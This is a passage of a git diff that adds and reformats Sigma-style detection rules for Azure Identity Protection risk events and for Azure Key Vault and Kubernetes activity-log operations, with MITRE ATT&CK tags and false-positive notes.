+ - attack.t1090 + - attack.command_and_control +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'malwareInfectedIPAddress' + condition: selection +falsepositives: + - Using an IP address that is shared by many users +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_new_coutry_region.yml b/src/main/resources/rules/azure/azure_identity_protection_new_coutry_region.yml new file mode 100644 index 000000000..791d237e8 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_new_coutry_region.yml @@ -0,0 +1,25 @@ +title: New Country +id: adf9f4d2-559e-4f5c-95be-c28dff0b1476 +status: experimental +description: Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#new-country + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1078 + - attack.persistence + - attack.defense_evasion + - attack.privilege_escalation + - attack.initial_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'newCountry' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_password_spray.yml b/src/main/resources/rules/azure/azure_identity_protection_password_spray.yml new file mode 100644 index 000000000..a477ec6c3 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_password_spray.yml @@ -0,0 +1,22 @@ +title: Password Spray Activity +id: 28ecba0a-c743-4690-ad29-9a8f6f25a6f9 +status: experimental +description: Indicates that a password spray attack has been successfully performed. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#password-spray + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1110 + - attack.credential_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'passwordSpray' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_prt_access.yml b/src/main/resources/rules/azure/azure_identity_protection_prt_access.yml new file mode 100644 index 000000000..c2c1dbdb7 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_prt_access.yml @@ -0,0 +1,22 @@ +title: Primary Refresh Token Access Attempt +id: a84fc3b1-c9ce-4125-8e74-bdcdb24021f1 +status: experimental +description: Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/07 +tags: + - attack.t1528 + - attack.credential_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'attemptedPrtAccess' + condition: selection +falsepositives: + - This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_suspicious_browser.yml b/src/main/resources/rules/azure/azure_identity_protection_suspicious_browser.yml new file mode 100644 index 000000000..1d39a814a --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_suspicious_browser.yml @@ -0,0 +1,25 @@ +title: Suspicious Browser Activity +id: 944f6adb-7a99-4c69-80c1-b712579e93e6 +status: experimental +description: Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-browser + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1078 + - attack.persistence + - attack.defense_evasion + - attack.privilege_escalation + - attack.initial_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'suspiciousBrowser' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_threat_intel.yml b/src/main/resources/rules/azure/azure_identity_protection_threat_intel.yml new file mode 100644 index 000000000..c094c3138 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_threat_intel.yml @@ -0,0 +1,26 @@ +title: Azure AD Threat Intelligence +id: a2cb56ff-4f46-437a-a0fa-ffa4d1303cba +status: experimental +description: Indicates user activity that is unusual for the user or consistent with known attack patterns. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/07 +tags: + - attack.t1078 + - attack.persistence + - attack.defense_evasion + - attack.privilege_escalation + - attack.initial_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'investigationsThreatIntelligence' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_token_issuer_anomaly.yml b/src/main/resources/rules/azure/azure_identity_protection_token_issuer_anomaly.yml new file mode 100644 index 000000000..38ca23aab --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_token_issuer_anomaly.yml @@ -0,0 +1,22 @@ +title: SAML Token Issuer Anomaly +id: e3393cba-31f0-4207-831e-aef90ab17a8c +status: experimental +description: Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#token-issuer-anomaly + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1606 + - attack.credential_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'tokenIssuerAnomaly' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_unfamilar_sign_in.yml b/src/main/resources/rules/azure/azure_identity_protection_unfamilar_sign_in.yml new file mode 100644 index 000000000..d9dbd1c9c --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_unfamilar_sign_in.yml @@ -0,0 +1,25 @@ +title: Unfamiliar Sign-In Properties +id: 128faeef-79dd-44ca-b43c-a9e236a60f49 +status: experimental +description: Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1078 + - attack.persistence + - attack.defense_evasion + - attack.privilege_escalation + - attack.initial_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'unfamiliarFeatures' + condition: selection +falsepositives: + - User changing to a new device, location, browser, etc. +level: high diff --git a/src/main/resources/rules/azure/azure_keyvault_key_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_keyvault_key_modified_or_deleted.yml index ab657e79c..e23b60ee6 100644 --- a/src/main/resources/rules/azure/azure_keyvault_key_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_keyvault_key_modified_or_deleted.yml @@ -1,17 +1,23 @@ title: Azure Keyvault Key Modified or Deleted id: 80eeab92-0979-4152-942d-96749e11df40 +status: test description: Identifies when a Keyvault Key is modified or deleted in Azure. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/16 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/16 +modified: 2022/08/23 +tags: + - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE/ACTION @@ -22,13 +28,8 @@ detection: - MICROSOFT.KEYVAULT/VAULTS/KEYS/BACKUP/ACTION - MICROSOFT.KEYVAULT/VAULTS/KEYS/PURGE/ACTION condition: selection -level: medium -tags: - - attack.impact - - attack.credential_access - - attack.t1552 - - attack.t1552.001 falsepositives: - - Key being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Key being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_keyvault_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_keyvault_modified_or_deleted.yml index d63cfe24d..9d6b31f4b 100644 --- a/src/main/resources/rules/azure/azure_keyvault_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_keyvault_modified_or_deleted.yml @@ -1,29 +1,30 @@ title: Azure Key Vault Modified or Deleted id: 459a2970-bb84-4e6a-a32e-ff0fbd99448d +status: test description: Identifies when a key vault is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/16 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/16 +modified: 2022/08/23 +tags: + - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KEYVAULT/VAULTS/WRITE - MICROSOFT.KEYVAULT/VAULTS/DELETE - MICROSOFT.KEYVAULT/VAULTS/DEPLOY/ACTION - MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE condition: selection -level: medium -tags: - - attack.impact - - attack.credential_access - - attack.t1552 - - attack.t1552.001 falsepositives: - - Key Vault being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Key Vault being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_keyvault_secrets_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_keyvault_secrets_modified_or_deleted.yml index b31895d4a..a97b431d7 100644 --- a/src/main/resources/rules/azure/azure_keyvault_secrets_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_keyvault_secrets_modified_or_deleted.yml @@ -1,17 +1,23 @@ title: Azure Keyvault Secrets Modified or Deleted id: b831353c-1971-477b-abb6-2828edc3bca1 +status: test description: Identifies when secrets are modified or deleted in Azure. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/16 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/16 +modified: 2022/08/23 +tags: + - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE - MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE - MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION @@ -21,13 +27,8 @@ detection: - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RESTORE/ACTION - MICROSOFT.KEYVAULT/VAULTS/SECRETS/SETSECRET/ACTION condition: selection -level: medium -tags: - - attack.impact - - attack.credential_access - - attack.t1552 - - attack.t1552.001 falsepositives: - - Secrets being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Secrets being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_admission_controller.yml b/src/main/resources/rules/azure/azure_kubernetes_admission_controller.yml index d8f36f7b2..62467b426 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_admission_controller.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_admission_controller.yml @@ -1,34 +1,38 @@ title: Azure Kubernetes Admission Controller id: a61a3c56-4ce2-4351-a079-88ae4cbd2b58 -description: Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information. -author: Austin Songer @austinsonger -status: experimental -date: 2021/11/25 -modified: 2021/11/26 +status: test +description: | + Identifies when an admission controller is executed in Azure Kubernetes. + A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. + The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. + An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. + For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. + An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. + An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information. references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes -logsource: - product: azure - service: activitylogs -detection: - selection1: - properties.message|startswith: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO - properties.message|endswith: - - /MUTATINGWEBHOOKCONFIGURATIONS/WRITE - - /VALIDATINGWEBHOOKCONFIGURATIONS/WRITE - selection2: - properties.message|startswith: MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO - properties.message|endswith: - - /MUTATINGWEBHOOKCONFIGURATIONS/WRITE - - /VALIDATINGWEBHOOKCONFIGURATIONS/WRITE - condition: selection1 or selection2 -level: medium +author: Austin Songer @austinsonger +date: 2021/11/25 +modified: 2022/12/18 tags: - attack.persistence - attack.t1078 - attack.credential_access - attack.t1552 - attack.t1552.007 +logsource: + product: azure + service: activitylogs +detection: + selection: + operationName|startswith: + - 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO' + - 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO' + operationName|endswith: + - '/MUTATINGWEBHOOKCONFIGURATIONS/WRITE' + - '/VALIDATINGWEBHOOKCONFIGURATIONS/WRITE' + condition: selection falsepositives: -- Azure Kubernetes Admissions Controller may be done by a system administrator. -- If known behavior is causing false positives, it can be exempted from the rule. + - Azure Kubernetes Admissions Controller may be done by a system administrator. + - If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_cluster_created_or_deleted.yml b/src/main/resources/rules/azure/azure_kubernetes_cluster_created_or_deleted.yml index d9be4f586..60f6459f8 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_cluster_created_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_cluster_created_or_deleted.yml @@ -1,27 +1,28 @@ title: Azure Kubernetes Cluster Created or Deleted id: 9541f321-7cba-4b43-80fc-fbd1fb922808 +status: test description: Detects when a Azure Kubernetes Cluster is created or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/DELETE condition: selection -level: low -tags: - - attack.impact falsepositives: - - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/azure/azure_kubernetes_cronjob.yml b/src/main/resources/rules/azure/azure_kubernetes_cronjob.yml index 146f196aa..b038d3f08 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_cronjob.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_cronjob.yml @@ -1,34 +1,36 @@ title: Azure Kubernetes CronJob id: 1c71e254-6655-42c1-b2d6-5e4718d7fc0a -description: Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. -author: Austin Songer @austinsonger -status: experimental -date: 2021/11/22 +status: test +description: | + Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. + Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. + An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ - https://kubernetes.io/docs/concepts/workloads/controllers/job/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ -logsource: - product: azure - service: activitylogs -detection: - selection1: - properties.message|startswith: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/BATCH - properties.message|endswith: - - /CRONJOBS/WRITE - - /JOBS/WRITE - selection2: - properties.message|startswith: MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/BATCH - properties.message|endswith: - - /CRONJOBS/WRITE - - /JOBS/WRITE - condition: selection1 or selection2 -level: medium +author: Austin Songer @austinsonger +date: 2021/11/22 +modified: 2022/12/18 tags: - attack.persistence + - attack.t1053.003 - attack.privilege_escalation - attack.execution +logsource: + product: azure + service: activitylogs +detection: + selection: + operationName|startswith: + - 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/BATCH' + - 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/BATCH' + operationName|endswith: + - '/CRONJOBS/WRITE' + - '/JOBS/WRITE' + condition: selection falsepositives: - Azure Kubernetes CronJob/Job may be done by a system administrator. - If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_events_deleted.yml b/src/main/resources/rules/azure/azure_kubernetes_events_deleted.yml index 9252c26fb..577db6d43 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_events_deleted.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_events_deleted.yml @@ -1,23 +1,24 @@ title: Azure Kubernetes Events Deleted id: 225d8b09-e714-479c-a0e4-55e6f29adf35 +status: test description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml -logsource: - product: azure - service: activitylogs -detection: - selection_operation_name: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE - condition: selection_operation_name -level: medium +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/08/23 tags: - attack.defense_evasion - attack.t1562 - attack.t1562.001 +logsource: + product: azure + service: activitylogs +detection: + selection: + operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE + condition: selection falsepositives: -- Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_network_policy_change.yml b/src/main/resources/rules/azure/azure_kubernetes_network_policy_change.yml index 71b65a4f2..30525dc4c 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_network_policy_change.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_network_policy_change.yml @@ -1,30 +1,31 @@ title: Azure Kubernetes Network Policy Change id: 08d6ac24-c927-4469-b3b7-2e422d6e3c43 +status: test description: Identifies when a Azure Kubernetes network policy is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact + - attack.credential_access logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE condition: selection -level: medium -tags: - - attack.impact - - attack.credential_access falsepositives: - - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_pods_deleted.yml b/src/main/resources/rules/azure/azure_kubernetes_pods_deleted.yml index ac7d0e1df..4b97b1b0f 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_pods_deleted.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_pods_deleted.yml @@ -1,22 +1,23 @@ title: Azure Kubernetes Pods Deleted id: b02f9591-12c3-4965-986a-88028629b2e1 +status: test description: Identifies the deletion of Azure Kubernetes Pods. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml -logsource: - product: azure - service: activitylogs -detection: - selection_operation_name: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE - condition: selection_operation_name -level: medium +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/08/23 tags: - attack.impact +logsource: + product: azure + service: activitylogs +detection: + selection: + operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE + condition: selection falsepositives: -- Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. -- Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_role_access.yml b/src/main/resources/rules/azure/azure_kubernetes_role_access.yml index a3c9bf010..ab21c690d 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_role_access.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_role_access.yml @@ -1,21 +1,24 @@ title: Azure Kubernetes Sensitive Role Access id: 818fee0c-e0ec-4e45-824e-83e4817b0887 +status: test description: Identifies when ClusterRoles/Roles are being modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/BIND/ACTION @@ -25,9 +28,7 @@ detection: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/BIND/ACTION - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/ESCALATE/ACTION condition: selection -level: medium -tags: - - attack.impact falsepositives: - - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml index efea094a1..26e5f3a78 100644 --- a/src/main/resources/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml @@ -1,30 +1,31 @@ title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743 +status: test description: Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 